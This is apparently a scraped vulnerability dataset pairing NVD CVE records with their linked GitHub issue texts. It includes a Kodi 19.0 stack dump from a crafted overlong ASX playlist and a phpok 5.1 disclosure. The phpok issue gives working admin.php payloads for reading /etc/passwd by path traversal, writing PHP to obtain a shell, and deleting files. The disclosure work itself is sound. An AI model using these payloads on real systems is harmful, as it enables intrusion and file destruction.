000000E0BFF4D620 0000000000000015
000000E0BFF4D628 0000021CBDAC1600
000000E0BFF4D630 00007FF62549D580 kodi.00007FF62549D580
000000E0BFF4D638 0000021CBDAC16A0 &"pt*%ö\x7F"
000000E0BFF4DC10 0000021CBDD71F10 "<ASX version=\"3.0\">\r\n<Entry>\r\n<REF HREF=\"mms://site.com/ach/music/smpl/LACA-05928-002-tes_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
000000E0BFF4DC18 0001000000000000
000000E0BFF4DC20 0000021CBF7D10A0
000000E0BFF4DC28 00000000BDA60930
000000E0BFF4DC30 00007FF6254B59B0 kodi.00007FF6254B59B0
000000E0BFF4DC38 0000000000000000
000000E0BFF4DC40 0000000000000000
000000E0BFF4DC48 00007FFB00000201
000000E0BFF4DC50 0000000000000006
000000E0BFF4DC58 0000000000000000
000000E0BFF4DC60 0000000000000000
000000E0BFF4DC68 0000000000000000
000000E0BFF4DC70 0000021CBF26F230
000000E0BFF4DC78 000000E0BFF4DBA0 "0YK%ö\x7F"
000000E0BFF4DC80 0000000000000000
000000E0BFF4DC88 0000000000000020
000000E0BFF4DC90 0000021CBF706200 "C:\\Users\\THINKPAD\\Desktop\\"
000000E0BFF4DC98 0000000000000000
000000E0BFF4DCA0 0000000000000000
000000E0BFF4DCA8 000000000000000F
000000E0BFF4DCB0 000006988439F3AC
000000E0BFF4DCB8 00007FFB70C347CD return to ntdll.00007FFB70C347CD from ntdll.00007FFB70C34880
000000E0BFF4DCC0 0000021CB4C59AD0 &"À4¡#ö\x7F"
000000E0BFF4DCC8 0000021CB4C59AC0
000000E0BFF4DCD0 000000E0BFF4DD89
000000E0BFF4DCD8 00007FF623CF1D19 return to kodi.00007FF623CF1D19 from ???
000000E0BFF4DCE0 0000021CB4C59AC0
000000E0BFF4DCE8 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DCF0 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DCF8 00007FFB6E33F05B return to ucrtbase.00007FFB6E33F05B from ???
000000E0BFF4DD00 000000E0BFF4E110 &"profile/Database/MyMusic82.db"
000000E0BFF4DD08 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DD10 0000000000000000
000000E0BFF4DD18 0000000000000000
000000E0BFF4DD20 0000021CB4C59AC0
000000E0BFF4DD28 00007FF623A687D5 return to kodi.00007FF623A687D5 from kodi.00007FF6252ADB30
000000E0BFF4DD30 000000E0BFF4E110 &"profile/Database/MyMusic82.db"
000000E0BFF4DD38 0000021CB6C02A20 &"à.¦#ö\x7F"
000000E0BFF4DD40 0000000000000000
000000E0BFF4DD48 000000E0BFF4E618 &"profile/Database/MyMusic82.db"
000000E0BFF4DD50 0000021CB4C59AD0 &"À4¡#ö\x7F"
000000E0BFF4DD58 0000021CB4C59AC0
000000E0BFF4DD60 0000021C00000000
000000E0BFF4DD68 00007FF623E5964B return to kodi.00007FF623E5964B from kodi.00007FF6252ADB30
000000E0BFF4DD70 000000E0BFF4DE80
000000E0BFF4DD78 0000000000000013
000000E0BFF4DD80 FFFFFFFFFFFFFFFE
000000E0BFF4DD88 0000021CBDA60930 "C:\\Users\\THINKPAD\\Desktop\\poc.asx"
000000E0BFF4DD90 0000021CB4AB0100
000000E0BFF4DD98 0000000000000021
000000E0BFF4DDA0 000000000000002F
000000E0BFF4DDA8 000006988439F42C
000000E0BFF4DDB0 0000000000000000
000000E0BFF4DDB8 0000000000000000
000000E0BFF4DDC0 000000E0BFF4EB78
000000E0BFF4DDC8 0000000000000000
000000E0BFF4DDD0 0000021CB6CA4D10 &" ;Ã#ö\x7F"
000000E0BFF4DDD8 0000021CB6C02A20 &"à.¦#ö\x7F"
000000E0BFF4DDE0 000000E0BFF4DEF0
000000E0BFF4DDE8 00007FF623C33FEF return to kodi.00007FF623C33FEF from kodi.00007FF623CF1C60
000000E0BFF4DDF0 0000021CB4AB0100
000000E0BFF4DDF8 0000021CBF797C50
000000E0BFF4DE00 0000000000000000
000000E0BFF4DE08 0000000000000000
000000E0BFF4DE10 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DE18 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4DE20 0000021CB4AB0100
000000E0BFF4DE28 0000021CBF797E90
000000E0BFF4DE30 0000000000000000
000000E0BFF4DE38 0000000000000000
000000E0BFF4DE40 0000021CB4AB0000
000000E0BFF4DE48 0000000000000000
000000E0BFF4DE50 FFFFFFFFFFFFFFFE
000000E0BFF4DE58 00007FFB70C358D1 return to ntdll.00007FFB70C358D1 from ntdll.00007FFB70C34FE0
000000E0BFF4DE60 0000021CB4AB0340
000000E0BFF4DE68 FFFFFFFFFFFFFFFE
000000E0BFF4DE70 0000000000000003
000000E0BFF4DE78 0000021CBF523000
000000E0BFF4DE80 0000000000000008
000000E0BFF4DE88 00007FFB70C352DC return to ntdll.00007FFB70C352DC from ntdll.00007FFB70C32DF8
000000E0BFF4DE90 0000000000000000
000000E0BFF4DE98 000000E0BFF4E0F0 "ŒÈ9„˜\x06"
000000E0BFF4DEA0 0000000000000000
000000E0BFF4DEA8 0000000000000000
000000E0BFF4DEB0 0000000000000003
000000E0BFF4DEB8 00007FFB70C352DC return to ntdll.00007FFB70C352DC from ntdll.00007FFB70C32DF8
000000E0BFF4DEC0 0000021CBF3CAC88 "nd descriptors.\n\n Usage:\n\n class C(metaclass=ABCMeta):\n @abstractmethod\n def my_abstract_method(self, ...):\n ...\n "
000000E0BFF4DEC8 0000000000000001
000000E0BFF4DED0 000006988439F6EC
000000E0BFF4DED8 0000000000000001
000000E0BFF4DEE0 0000000000000000
000000E0BFF4DEE8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DEF0 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DEF8 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DF00 00000000FFFFFFFF
000000E0BFF4DF08 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DF10 000000E0BFF4E020 "¼÷9„˜\x06"
000000E0BFF4DF18 00007FF623CB88AD return to kodi.00007FF623CB88AD from kodi.00007FF6252ADB30
000000E0BFF4DF20 0000000000000000
000000E0BFF4DF28 0000000000000000
000000E0BFF4DF30 00007FF6255DB960 kodi.00007FF6255DB960
000000E0BFF4DF38 0000000000000000
000000E0BFF4DF40 0000021CBF600DA0 "ÝÌÝÌ"
000000E0BFF4DF48 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4DF50 0000021CB4AB0340
000000E0BFF4DF58 00007FFB007000C0
000000E0BFF4DF60 0000021CBF797910
000000E0BFF4DF68 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4DF70 0000021CB4AB0100
000000E0BFF4DF78 0000021CBF0D4AC0
000000E0BFF4DF80 FFFFFFFFFFFFFFFE
000000E0BFF4DF88 FFFFFFFFFFFFFFFE
000000E0BFF4DF90 0000021CB4AB0000
000000E0BFF4DF98 0000000000000000
000000E0BFF4DFA0 0000021CBF001A80 "ÝÌÝÌ"
000000E0BFF4DFA8 FFFFFFFFFFFFFFFE
000000E0BFF4DFB0 000006988439FCFC
000000E0BFF4DFB8 0000021C004002A0
000000E0BFF4DFC0 0000000000000000
000000E0BFF4DFC8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DFD0 00000000000002B8
000000E0BFF4DFD8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DFE0 0000021CB85729A0
000000E0BFF4DFE8 0000021CBD0A9840 &" <\r$ö\x7F"
000000E0BFF4DFF0 000000E0BFF4E089 "æô¿à"
000000E0BFF4DFF8 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E000 000006988439F79C
000000E0BFF4E008 00007FFB70C348D0 return to ntdll.00007FFB70C348D0 from ntdll.00007FFB70C35710
000000E0BFF4E010 0000021CBD0D26D0
000000E0BFF4E018 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E020 000006988439F7BC
000000E0BFF4E028 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E030 0000021CBD20C1C0 "ð“Q%ö\x7F"
000000E0BFF4E038 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E040 000006988439F7EC
000000E0BFF4E048 0000021CB69C48D0 &"0«¥#ö\x7F"
000000E0BFF4E050 0000000000000000
000000E0BFF4E058 0000000000000000
000000E0BFF4E060 0000000000000000
000000E0BFF4E068 FFFFFFFFFFFFFFFE
000000E0BFF4E070 FFFFFFFFFFFFFFFE
000000E0BFF4E078 0000021CB4C34800
000000E0BFF4E080 00000000FFFFFFFF
000000E0BFF4E088 000000E0BFF4E618 &"profile/Database/MyMusic82.db"
000000E0BFF4E090 0000021CBDFB4C00 "Thread %s %s terminating (autodelete)"
000000E0BFF4E098 00007FF623FC38D5 return to kodi.00007FF623FC38D5 from kodi.00007FF6252ADB30
000000E0BFF4E0A0 0000000000000000
000000E0BFF4E0A8 000000000000000F
000000E0BFF4E0B0 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4E0B8 00007FFB6E33F05B return to ucrtbase.00007FFB6E33F05B from ???
000000E0BFF4E0C0 0000021CBD0AA230
000000E0BFF4E0C8 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E0D0 000006988439C8EC
000000E0BFF4E0D8 0000021CB85729A0
000000E0BFF4E0E0 000006988439C8FC
000000E0BFF4E0E8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4E0F0 000006988439C88C
000000E0BFF4E0F8 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E100 0000000000000000
000000E0BFF4E108 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4E110 0000021CBDFB4A00 "profile/Database/MyMusic82.db"
000000E0BFF4E118 0000021CBD20C1C0 "ð“Q%ö\x7F"
000000E0BFF4E120 0000000000000000
000000E0BFF4E128 000000000000000F
000000E0BFF4E130 000000E0BFF4E240
000000E0BFF4E138 00007FF623CB88AD return to kodi.00007FF623CB88AD from kodi.00007FF6252ADB30
000000E0BFF4E140 000000E0BFF4E201
000000E0BFF4E148 00007FF623C273E1 return to kodi.00007FF623C273E1 from kodi.00007FF6252ADB30
000000E0BFF4E150 00007FF6255193F0 kodi.00007FF6255193F0
000000E0BFF4E158 0000021C00000000
000000E0BFF4E160 0000021CBF0D4CC0 " return list(iterable)\n # Let the base class default method raise the TypeError\n return JSONEncoder.default(self, o)\n\n "
000000E0BFF4E168 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E170 FFFFFFFFFFFFFFFE
000000E0BFF4E178 FFFFFFFFFFFFFFFE
000000E0BFF4E180 000006988439C81C
000000E0BFF4E188 0000021CBF0D4CC0 " return list(iterable)\n # Let the base class default method raise the TypeError\n return JSONEncoder.default(self, o)\n\n "
000000E0BFF4E190 0000021CBD20A8F0 "àž_%ö\x7F"
000000E0BFF4E198 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4F7E0 0000000000000000
000000E0BFF4F7E8 00007FFB70C62651 return to ntdll.00007FFB70C62651 from ???
000000E0BFF4F7F0 0000000000000000
000000E0BFF4F7F8 0000000000000000
000000E0BFF4F800 0000000000000000
000000E0BFF4F808 0000000000000000
000000E0BFF4F810 0000000000000000
000000E0BFF4F818 0000000000000000
000000E0BFF4F820 0000000000000000
000000E0BFF4F828 0000000000000000
000000E0BFF4F830 0000000000000000
000000E0BFF4F838 0000000000000000
000000E0BFF4F840 000004E8FFFFFB30
000000E0BFF4F848 000004D0FFFFFB30
000000E0BFF4F850 0000000000000019
000000E0BFF4F858 0000000000000000
000000E0BFF4F860 0000000000000000
000000E0BFF4F868 0000000000000000
000000E0BFF4F870 0000000000000000
000000E0BFF4F878 0000000000000000
000000E0BFF4F880 0000000000000000
000000E0BFF4F888 0000000000000000
000000E0BFF4F890 0000000000000000
000000E0BFF4F898 0000000000000000
000000E0BFF4F8A0 0000000000000000
000000E0BFF4F8A8 0000000000000000
000000E0BFF4F8B0 0000000000000000
000000E0BFF4F8B8 0000000000000000
000000E0BFF4F8C0 0000000000000000
000000E0BFF4F8C8 0000000000000000
000000E0BFF4F8D0 0000000000000000
000000E0BFF4F8D8 0000000000000000
000000E0BFF4F8E0 0000000000000000
000000E0BFF4F8E8 0000000000000000
000000E0BFF4F8F0 0000000000000000
000000E0BFF4F8F8 0000000000000000
000000E0BFF4F900 0000000000000000
000000E0BFF4F908 0000000000000000
000000E0BFF4F910 0000000000000000
000000E0BFF4F918 0000000000000000
### Your Environment
Used Operating system:
<!--- Include as many relevant details about the environment you experienced the bug in -->
<!--- Put your text below this line. Checkboxes can easily be ticked once issue is created -->
- [ ] Windows 10 * 64
- Operating system version/name:
- Kodi version: 19.0
<!--- End of this issue -->
*note: Once the issue is made we require you to update it with new information or Kodi versions should that be required.
Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.* | Kodi v19.0 Buffer Overflow | https://api.github.com/repos/xbmc/xbmc/issues/20305/comments | 23 | 2021-10-12T06:07:43Z | 2021-11-14T02:28:57Z | https://github.com/xbmc/xbmc/issues/20305 | 1,023,403,439 | 20,305 | 2,739 |
CVE-2020-18438 | 2021-11-02T18:15:07.837 | Directory traversal vulnerability in qinggan phpok 5.1, allows attackers to disclose sensitive information, via the title parameter to admin.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/qinggan/phpok/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/qinggan/phpok/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpok:phpok:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F39153AD-B68D-4595-93AD-AE703E8F5B41",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/qinggan/phpok/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"qinggan",
"phpok"
] | ## Variable Overwrite Vulnerability
from the Entrance of framework,i discovered `parse_str` variable overwrite in `framework/init.php`
![image_1d4agk20clki110s1ii7u6q1gah9.png-146.3kB][9]
we could watch `$query_string` parameter in `framework/libs/server.php` :
![image_1d4agn7g08k431a1fsakoi1kjdm.png-135.9kB][10]
payload:`http://phpok/?data[script]=passer6y`
![image_1d4ai86gk1ukh1dd0lgt83e6nl9.png-228.1kB][11]
## Vulnerability to read arbitrary files
![image_1d4i1bkhf1fbq1q6nk7g19pe1hjl23.png-402.7kB][13]
back to the:
framework/admin/tpl_control.php
![image_1d4i1oe4tg81163s1hcn18a21kp530.png-197.8kB][14]
framework/admin/appsys_control.php
![image_1d4i1pat21lbr1fe518r01rf2tjs3d.png-443.2kB][15]
there is two file have this vulnerability:
payload1:
```
/admin.php?c=appsys&f=file_edit&id=fav&title=../../../../../../../etc/passwd
```
payload2:
```
/admin.php?c=tpl&f=edit&id=1&title=../../../../../../../etc/passwd
```
![image_1d4l4ok81h0c1ee2dk2ann3p1m.png-521.8kB][16]
![image_1d4i1rfar1g7u1ieefsrd4dd0l3q.png-280.1kB][17]
## Arbitrary File Writing to getshell
`edit_save_f()` function In `framework/admin/tpl_control.php` 383 line
![image_1d4l5pf9lkqtv2q8cr1t6f6ku4k.png-280.9kB][22]
payload:`/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f`
![image_1d4ig2hol1ok17857k61r66bv74k.png-383.1kB][24]
## Arbitrary file delete Vulnerability
framework/admin/tpl_control.php 303行 `delfile_f()`函数:
![image_1d4l604qqo9c1krlerf7eu1o1b51.png-247.1kB][25]
payload:` /admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php`
![image_1d4ijnk021ui812v11pc8fap1sb351.png-172kB][27]
[9]: http://static.zybuluo.com/Passer6y/p13wmvj4khkxren72b6fdvhj/image_1d4agk20clki110s1ii7u6q1gah9.png
[10]: http://static.zybuluo.com/Passer6y/3jsnuyq9m72tfqg330ytcfib/image_1d4agn7g08k431a1fsakoi1kjdm.png
[11]: http://static.zybuluo.com/Passer6y/fgpw2yg6wjc5o5r1hm9fqx08/image_1d4ai86gk1ukh1dd0lgt83e6nl9.png
[13]: http://static.zybuluo.com/Passer6y/pv6mu4h93o84a3o6vbjck74b/image_1d4i1bkhf1fbq1q6nk7g19pe1hjl23.png
[14]: http://static.zybuluo.com/Passer6y/pfb89v0i59glsveyitgnmsa5/image_1d4i1oe4tg81163s1hcn18a21kp530.png
[15]: http://static.zybuluo.com/Passer6y/hg2cxnqchsm3renmw1sjlvfr/image_1d4i1pat21lbr1fe518r01rf2tjs3d.png
[16]: http://static.zybuluo.com/Passer6y/p2zlylym1mfm33vj2rjbmgw5/image_1d4l4ok81h0c1ee2dk2ann3p1m.png
[17]: http://static.zybuluo.com/Passer6y/bs2osjm0xntsb9zqzhl9ulyo/image_1d4i1rfar1g7u1ieefsrd4dd0l3q.png
[18]: http://static.zybuluo.com/Passer6y/awxmk7gqoazwfskrczgm6diu/image_1d4l58h6eo1l7892im1v7g16352g.png
[19]: http://static.zybuluo.com/Passer6y/jyu4m8ywltgdccn0qugy8chf/image_1d4l59l5p1j23upj6grfd1a842t.png
[20]: http://static.zybuluo.com/Passer6y/344q4ca2sky0t9anxcdwv1ez/image_1d4l5c0qh1h79tbr16bj1i191a223a.png
[21]: http://static.zybuluo.com/Passer6y/tkwncti7c0woomb9v86n13bh/image_1d4l5lbfr1fek1kfa1a9i1nta1hcn47.png
[22]:http://static.zybuluo.com/Passer6y/fpwbu40s2yhrz8u9bobpypgy/image_1d4l5pf9lkqtv2q8cr1t6f6ku4k.png
[23]: http://static.zybuluo.com/Passer6y/uqtqxwzg456sh1iuoxi1vcpa/image_1d4l51jr2o901dl4r9ff6vfus13.png
[24]:http://static.zybuluo.com/Passer6y/v8l0twvzk43u4oyzev8zes3m/image_1d4ig2hol1ok17857k61r66bv74k.png
[25]: http://static.zybuluo.com/Passer6y/zb6si257j56p2qexs7ecsed1/image_1d4l604qqo9c1krlerf7eu1o1b51.png
[26]: http://static.zybuluo.com/Passer6y/5zowcit791ndjvyt3vxp5yb7/image_1d4l61nqml2roi8i4jv1j1aif5e.png
[27]:http://static.zybuluo.com/Passer6y/1a2eynhxyhmmljm5z9ok36qx/image_1d4ijnk021ui812v11pc8fap1sb351.png
[28]: http://static.zybuluo.com/Passer6y/f3046swiq74ti2j1iy4bkx0u/image_1d4jrep0n147ufdpgr21k8md3a9.png
[29]: http://static.zybuluo.com/Passer6y/w72a50ygueplfvt39s3gj3a4/image_1d4l6afmq17svv8q28m3ev1sih5r.png
[30]: http://static.zybuluo.com/Passer6y/0dffvgai9y9fd4cv0bozqgjl/image_1d4juou7p14v9nli1isr1u561ee51m.png
[31]: http://static.zybuluo.com/Passer6y/6vda01kdf6371cgnylfro3p3/image_1d4l6siej1ud37qu1ebv1fd11d1m9.png
[32]: http://static.zybuluo.com/Passer6y/nyc1cs1p2pcmesp9fw5rmvr5/image_1d4l7b4pd1d0186u17a8cm1ehsm.png
[33]: http://static.zybuluo.com/Passer6y/exb2sbtm64zn2dpmlgsx58xj/image_1d4l7d16r1aqq19ov1fn312vi10k023.png | phpok 5.1 have Some Vulnerability | https://api.github.com/repos/qinggan/phpok/issues/4/comments | 1 | 2019-03-06T06:25:51Z | 2019-04-28T19:29:17Z | https://github.com/qinggan/phpok/issues/4 | 417,643,168 | 4 | 2,740 |
CVE-2020-20657 | 2021-11-02T18:15:07.953 | Buffer overflow vulnerability in fcovatti libiec_iccp_mod v1.5, allows attackers to cause a denial of service via an unexpected packet while trying to connect. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/fcovatti/libiec_iccp_mod/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/fcovatti/libiec_iccp_mod/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libiec_iccp_mod_project:libiec_iccp_mod:1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "B80FC647-C393-415F-9AA9-B02EA8C954B0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/fcovatti/libiec_iccp_mod/issues/1 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"fcovatti",
"libiec_iccp_mod"
] | ` | ` | https://api.github.com/repos/fcovatti/libiec_iccp_mod/issues/1/comments | 0 | 2019-10-10T02:31:18Z | 2019-10-10T07:00:16Z | https://github.com/fcovatti/libiec_iccp_mod/issues/1 | 504,995,096 | 1 | 2,741 |
CVE-2020-20658 | 2021-11-02T18:15:07.997 | Buffer overflow vulnerability in fcovatti libiec_iccp_mod v1.5, allows attackers to cause a denail of service when trying to calloc an unexpectiedly large space. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/fcovatti/libiec_iccp_mod/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/fcovatti/libiec_iccp_mod/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libiec_iccp_mod_project:libiec_iccp_mod:1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "B80FC647-C393-415F-9AA9-B02EA8C954B0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/fcovatti/libiec_iccp_mod/issues/2 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"fcovatti",
"libiec_iccp_mod"
] | ` | ` | https://api.github.com/repos/fcovatti/libiec_iccp_mod/issues/2/comments | 0 | 2019-10-10T03:44:20Z | 2019-10-10T06:59:46Z | https://github.com/fcovatti/libiec_iccp_mod/issues/2 | 505,014,575 | 2 | 2,742 |
CVE-2020-21572 | 2021-11-02T18:15:08.037 | Buffer overflow vulnerability in function src_parser_trans_stage_1_2_3 trgil gilcc before commit 803969389ca9c06237075a7f8eeb1a19e6651759, allows attackers to cause a denial of service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/trgil/gilcc/commit/803969389ca9c06237075a7f8eeb1a19e6651759"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/trgil/gilcc/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/trgil/gilcc/commit/803969389ca9c06237075a7f8eeb1a19e6651759"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/trgil/gilcc/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
